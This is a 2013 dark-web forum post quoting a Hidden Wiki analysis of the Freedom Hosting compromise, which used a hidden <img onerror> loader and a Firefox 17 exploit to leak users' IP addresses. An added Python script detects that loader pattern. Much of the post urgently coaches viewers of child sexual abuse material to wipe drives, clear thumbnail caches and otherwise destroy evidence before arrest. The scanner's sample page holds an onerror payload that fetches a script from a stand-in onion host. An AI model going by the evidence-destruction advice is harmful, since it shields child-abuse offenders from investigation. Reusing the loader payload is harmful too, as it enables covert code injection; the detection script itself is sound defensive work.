« on: August 05, 2013, 06:32 pm »
The Hidden Wiki discussion page has the most comprehensive explanation of the attack that I've found. The only part I don't agree with, simply because there is no evidence, is the claim that the FH admin was identified through bitcoin cashing out. It is factually incorrect that Onion Bank was started months ago. It was started like 10 days before the bust. However, the FH admin may have been accepting private bitcoin donations, particularly from the CP site operators and users. After all, someone was paying the bills to keep the site running. It's possible that the FBI made a donation and tracked the payment, and if the FH admin didn't take proper precautions in cashing out, he was identified that way. All this will come out in the discovery during his court case.
I do agree that the compromise of Tormail accounts could be very bad for some members of our community, especially if they didn't encrypt their emails and routinely delete read emails from the server.
Here's the Hidden Wiki discussion of the attack.
1. It runs only if Javascript was enabled and affects Firefox 17 on Windows. The exploit used (MFSA 2013-53) was fixed in Firefox 17.0.7, which is the one used in the latest Tor Browser Bundle, and relies on Windows libraries to execute its payload. If you were using an outdated Tor Browser on Windows and you had Javascript enabled (it is by default) then you have definitely been compromised. If you were using Tor on any other OS, had disabled Javascript, or had the latest version of the Tor Browser Bundle (Torbrowser - Help - About shows the version, which must be 17.0.7 or higher) then you are safe and your public IP has not been transmitted anywhere.
2. The exploit has only been online since after the servers came back on August 3rd, 2013. Now read on for the details...
By default, the Tor Browser comes with NoScript set to "Allow All Javascript Globally", meaning that Javascript is enabled by default. They do this to make it convenient for users, which is why it's the default setting even though it's not safe.
3. If you were running an exploitable version of the Tor Browser on Windows and didn't either manually set NoScript to "Forbid Javascript Globally" or disabled Javascript entirely via the Firefox settings, then you are absolutely 100% busted. But if you had disabled Javascript like smart people kept telling you, using either of the two methods mentioned, then the code never executed and you are safe.
4. The FreedomHosting compromise consisted of a small, non-existent image <img> tag injected into all Freedom Hosting sites, and this <img> tag contained an <img onerror=""> event attribute. The fact that the image was missing meant that the "onerror" code ran and retrieved the rest of the code from another Onion site. They did it this way via a small, hidden image to avoid drawing attention to any obvious <script> tags.
5. The main payload (main exploit code) from that onion site then created an iframe and set a cookie in it (the sole purpose of which was to reliably identify your unique browser as you traveled between different compromised FH sites, to build a list of which FH sites you've been visiting) and more importantly ran some 0-day exploits using heap overflows to run any code they desired and escape the Tor sandbox.
6. The 0day exploit code executed some functions that revealed your public internet IP address, MAC address, local hostname (such as "LarrysPC") and what Freedom Hosting site you were browsing (they used a unique UDID for each compromised website) and sent it all to a clear-net IP in Washington. This is no joke. I wish I was kidding. It really did this! They transmit your unique browser ID (cookie value) over the clear internet to their public-internet server, thus giving them a physical person tied to the "random person" they've been observing browsing the different FH sites. With this connection performed, they know your public IP, they have the computer's hostname & MAC address to conclusively identify your computer, they have your unique browser ID cookie, and they have a full list of Freedom Hosting sites that have been viewed by that unique browser. They know exactly how deeply you are involved and their lists allow them to target the people that are clearly intentionally seeking out illegal content.
7. The use of 0day exploits means that the attacker had the huge resources required to find such completely new exploits, and is therefore most likely the government.
8. The fact that FreedomHosting was compromised means that the attacker either physically seized the servers and installed the code (government), or managed to exploit the webserver software (other malicious attacker). Considering recent news reports, it is clear that it was the government.
9. The fact that the clear-net IP collecting all the data is in Washington and that FreedomHosting is now down without a word suggests that the attacker was in fact the FBI.
10. The attacker now has the public IP addresses + what FreedomHosting site you were viewing of everybody that had Javascript enabled on Windows with an outdated Tor Browser Bundle. You better prepare to be raided. Destroy all the evidence now, if your freedom depends on it.
11. The cookie is called "n_serv" and can be viewed under Tor Button - Cookie Protections. By default, Tor is set to erase all non-protected cookies on browser restarts (and to make all cookies non-protected unless explicitly told by the user to protect certain cookies). This means that the "n_serv" cookie will not persist between browser restarts, unless the FBI has made part of their exploit code tell Tor Button to protect the cookie. That is very unlikely, though, as it would be difficult to do so and wouldn't do them much good, since the cookie changing its value doesn't actually harm their operation. They will still get your public IP for every unique browser ID that's being transmitted to them, so it doesn't matter to them if the cookie gets cleared and the browser ID changes. Therefore, due to the fact that the cookie clears itself on restart, the only way to know whether you've been affected, if you're running a vulnerable browser bundle, is if your browser has been running non-stop since before FreedomHosting went down. Meaning that your browser has been running for at least 1 week, preferably 2 or more. If you've got no "n_serv" cookie in a session that has lasted that long then you conclusively know that the exploits have never successfully executed on your machine. The cookie only clears on browser restart. I've always been using NoScript in "Forbid Javascript Globally" mode, my last browser restart was over 2 weeks ago, I am 100% sure I have browsed some FH sites before they went offline without restarting this browser, and I don't have the cookie. People that have either set NoScript to globally forbid, or disabled Javascript entirely in the Firefox settings, are therefore conclusively safe. Everyone else will have been infected and can check for the existence of that cookie to verify that fact (it will only be there if their browser hasn't restarted in the past few weeks).
Note that the cookie will be created if Javascript is enabled, but the exploit that transmits your public IP to tie that cookie to your identity is a separate action and will only run on exploitable (outdated) Tor Browser Bundles on Windows. Therefore, the existence of the cookie is not enough reason to panic yet. If you're using Windows and you've got a Javascript-enabled Tor Browser that's older than 17.0.7 then your identity has absolutely been compromised.
12. Previous news reports from July 29th, 2013 show that the FBI performed a nationwide "child sex trafficking" bust, freeing 105 children and arresting 150 pimps/ring leaders (www.fbi.gov/news/stories/2013/july/operation-cross-country-recovering-victims-of-child-sex-trafficking/operation-cross-country-recovering-victims-of-child-sex-trafficking).
13. Other news from July 29th, 2013 shows that the FBI is trying to extradite "the biggest child-porn facilitator on the planet" from Ireland (www.independent.ie/irish-news/courts/fbi-bids-to-extradite-largest-childporn-dealer-on-planet-29469402.html). It seems that the FH admin was a 28 year old that was arrested in Ireland and that the javascript exploits were set up in a joint operation between the FBI and the Irish law enforcement, since all collected IPs were sent to the FBI. If this is the guy, then Freedom Hosting is never coming back, and he's looking at a lot of jailtime.
14. Also consider the fact that the attackers installed code that uniquely identifies each FreedomHosting site you were visiting, since FH served much more than just child porn. The FBI wouldn't want to bust down the doors of people that were looking at relatively harmless stuff from FreedomHosting. They really cared about knowing which specific sites you were viewing and took many steps to ensure that they accurately tracked which sites you visited, through the use of per-site UDIDs and a tracking cookie.
15. Timeline of events: FreedomHosting admin starts accepting BitCoins a few months ago. The FBI traces his BitCoin transactions to withdrawals into a real-world bank account via currency exchange services, thus revealing the identity of the FH admin, and an arrest is made on July 29th, 2013 in Ireland. The servers were then shut down. On August 3rd, 2013 the sites came back online with the exploit code installed.
16. It is pretty conclusive: Get a fucking move on if you were too stupid to disable Javascript, keep Tor Browser Bundle updated, were running Windows, and visited any of the FH sites after they came back online. You do not have much time. Someone in Washington, otherwise known as the FBI, now has your public IP and a list of which FH sites you were browsing. GET A FUCKING MOVE ON! NOW! Destroy everything before you end up behind bars! Remember to run multiple secure wipe-passes of your entire hard drives so that NOTHING can be recovered, and remember that encryption alone is not safe enough; data leaks out of your encrypted containers into the operating system's thumbnail caches. They might not be able to view your actual encrypted TrueCrypt images, but they sure as hell can see what kind of images you had been looking at in the past (Windows has a global thumbnail database containing smaller versions of all Thumbs.db contents from every drive on the system, Mac OS has a QuickLook cache of everything you have ever viewed, and Linux has similar leaks depending on what image viewers you were using). Also remember that they can force you to give up encryption keys (and even sentence you harshly based on suspicion if you refuse to give them out), so it's definitely not safe to keep encrypted TrueCrypt containers. Your freedom should be worth more than that. Take no chances. Perform a full 3-pass random DBAN (http://www.dban.org/) format of ALL hard disks that were used for child porn AND ALL operating system disks related to that! We are on the verge of a global law-enforcement crackdown unlike anything else ever before once the FBI uses the data they have collected, and you may only have a few days until the knock comes.
Don't waste time with 35-pass erases, it takes days and they may knock on the door sooner than it can finish and research shows that even a single-pass erase is safe enough, but if you are truly paranoid (even though you would not gain anything from it and would only waste more time) you could do 3 random passes just to be extra safe. Good luck everyone and may God be with you. Time to brace for impact. And remember that silence does not mean that nothing is going on. People that are getting busted won't have any time to connect to Tor and let others know they've been busted. Silence does not mean that busts are not taking place. The FBI is taking this FreedomHosting compromise as the biggest victory in human history. You should treat it with equal respect and do everything in your power to stay safe. This is the calm before the storm. You will see the victims being paraded around in a giant FBI press release within a month or two.
17. For those that had blocked Javascript and are safe: It's now a good idea to remember that Tor should never be trusted, and that any content from Tor sites can be compromised at any time. Always be sure to update your media players such as VLC to the latest versions to protect against exploits in media files. There are no signs that such tampering has taken place, but this is a good time to remind people to be smart. How to be as safe as you can be: 1: Keep Tor Browser Bundle up to date every time you get an update notification. 2: Always disable Javascript. 3: Always keep all your software fully updated. 4: Run everything in a virtual machine (VirtualBox is free) to avoid data leaking out into your main OS. 5: Use Linux in that VM even if you are primarily a Windows user, because Linux is a fuckton more resilient against attacks. 6: Use encrypted containers inside the VM if your freedom depends on your data being safe from prying eyes. 7: Trust no one. Never reveal personal info on Tormail (now compromised) or even Torchat. You never want to leak anything that leads back to you. Always assume that everyone is out to get you and you will never have the issue of trusting the wrong person.
18. More warnings (TORMAIL): The hidden service for Tormail has been compromised since it ran on FreedomHosting. It's therefore very likely that all the contents of your Tormail inboxes are in their hands. Do not log into your accounts. Depending on how Tormail works, your emails might possibly have been stored in encrypted form in the database and will only be decrypted whenever you log in. In that case, they can only read them by installing a backdoor that makes unencrypted copies as soon as someone logs into their account. Logging in would thereby give them the unencrypted versions. Alternatively, if Tormail already stored everything unencrypted then they already have a complete copy of it and no logging-in-and-deleting will do any good whatsoever. Unfortunately everything points towards Tormail just using a regular IMAP mail server hosted on Freedom Hosting (because of how they allowed regular Roundcube / SquirrelMail access to your mailbox, both of which are just regular unencrypted IMAP web clients), and that would mean that all plaintext emails are already in the FBI's hands and there's nothing you can do about it. Do not log in. Logging in can only make things worse! Tormail is guaranteed to be a major part of this sting because it (along with certain private messaging systems on boards) is the most likely place where people will reveal their true identities to people they've trusted. Tormail has been compromised and all you can do now is NOT log in, and pray that everything was stored as decrypt-on-demand via custom IMAP server software (unfortunately extremely unlikely because no off-the-shelf IMAP servers offer encrypted email storage). That, and destroy all the evidence so that anyone knocking down your door will find nothing on your computers.
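The quoted write-up describes two things a defender can mechanise: the loader pattern in item 4 (a hidden, broken `<img>` whose `onerror` handler pulls code from another site, used precisely to avoid a visible `<script>` tag) and the exposure rule in items 1, 3 and 18 (the IP-leaking payload only ran with Javascript enabled, on Windows, on a Tor Browser built on Firefox older than 17.0.7, while the cookie alone could appear anywhere Javascript ran). The script below is an added example written for this page, not code from the post, the Hidden Wiki or the actual exploit. It scans served HTML for `<img>`/`<iframe>` tags carrying inline event handlers and explains why each looks like that loader, and applies the post's exposure rule to a browser description. The sample page, the `example.onion` address and the tag attributes are constructed for illustration; the real injected markup is not reproduced here.

```python
"""Flag the hidden-<img>-with-onerror loader pattern and classify exposure
under the rule quoted in the post.  Added example; the HTML and hostnames
below are constructed, not captured from Freedom Hosting."""
import re
from html.parser import HTMLParser

PATCHED_VERSION = (17, 0, 7)           # first Firefox build the post calls safe
EVENT_ATTRS = ("onerror", "onload")    # inline handlers that run without a <script> tag
REMOTE_RE = re.compile(r"https?://[^\s'\"]+", re.I)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def parse_version(text):
    """'17.0.7' or '17.0.7esr' -> (17, 0, 7); short strings are padded with zeros."""
    parts = [int(n) for n in re.findall(r"\d+", text)[:3]]
    if not parts:
        raise ValueError("no version number in %r" % text)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def classify_exposure(os_name, js_enabled, firefox_version):
    """Apply the post's rule.  'safe': Javascript was off, nothing ran.
    'cookie-only': Javascript ran (so the n_serv cookie may exist) but the
    IP-leaking payload did not apply.  'exploited': Windows + Javascript +
    Firefox older than 17.0.7, the combination the post says leaked the IP."""
    if not js_enabled:
        return "safe"
    on_windows = os_name.strip().lower().startswith("win")
    if on_windows and parse_version(firefox_version) < PATCHED_VERSION:
        return "exploited"
    return "cookie-only"


class ImgHandlerScanner(HTMLParser):
    """Collect <img>/<iframe> tags that carry inline event handlers, with the
    reasons each one resembles the loader described in the post."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("img", "iframe"):
            return
        a = {k: (v or "") for k, v in attrs}      # HTMLParser lowercases attribute names
        handlers = {k: a[k] for k in EVENT_ATTRS if k in a}
        if not handlers:
            return
        reasons = ["inline %s handler" % "/".join(handlers)]
        if not a.get("src"):
            reasons.append("no src: onerror is guaranteed to fire")
        code = " ".join(handlers.values())
        if REMOTE_RE.search(code) or ".onion" in code.lower():
            reasons.append("handler references an external location")
        if "script" in code.lower() or "iframe" in code.lower():
            reasons.append("handler creates a script/iframe element")
        if (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                or HIDDEN_RE.search(a.get("style", ""))):
            reasons.append("element is hidden or 1px")
        self.findings.append({"tag": tag, "line": self.getpos()[0],
                              "src": a.get("src", ""), "handler": code,
                              "reasons": reasons})


def scan_html(html):
    """Return a list of findings (dicts) for every suspicious tag in `html`."""
    p = ImgHandlerScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: a benign logo, an injected loader, and an iframe with a
# harmless onload handler that should be reported but with a single reason.
SAMPLE_PAGE = """<html><body>
<h1>Board index</h1>
<img src="/images/logo.png" alt="logo">
<img src="" width="1" height="1" onerror="var s=document.createElement('script');s.src='http://example.onion/loader.js';document.body.appendChild(s)">
<iframe src="http://example.com/widget" onload="console.log('ok')"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print("line %d <%s src=%r>: %s" % (f["line"], f["tag"], f["src"], "; ".join(f["reasons"])))
    for setup in (("Windows", True, "17.0.6"), ("Windows", True, "17.0.7"),
                  ("Linux", True, "17.0.6"), ("Windows", False, "17.0.6")):
        print(setup, "->", classify_exposure(*setup))
```

A finding with only "inline onload handler" is normal site code; the loader the post describes stacks the other reasons (no `src`, hidden size, a handler that builds a `script` element pointing somewhere else), so rank by the number of reasons rather than alerting on any handler. The classifier only encodes the post's own rule; it does not check for the cookie, which the post notes is cleared on restart anyway.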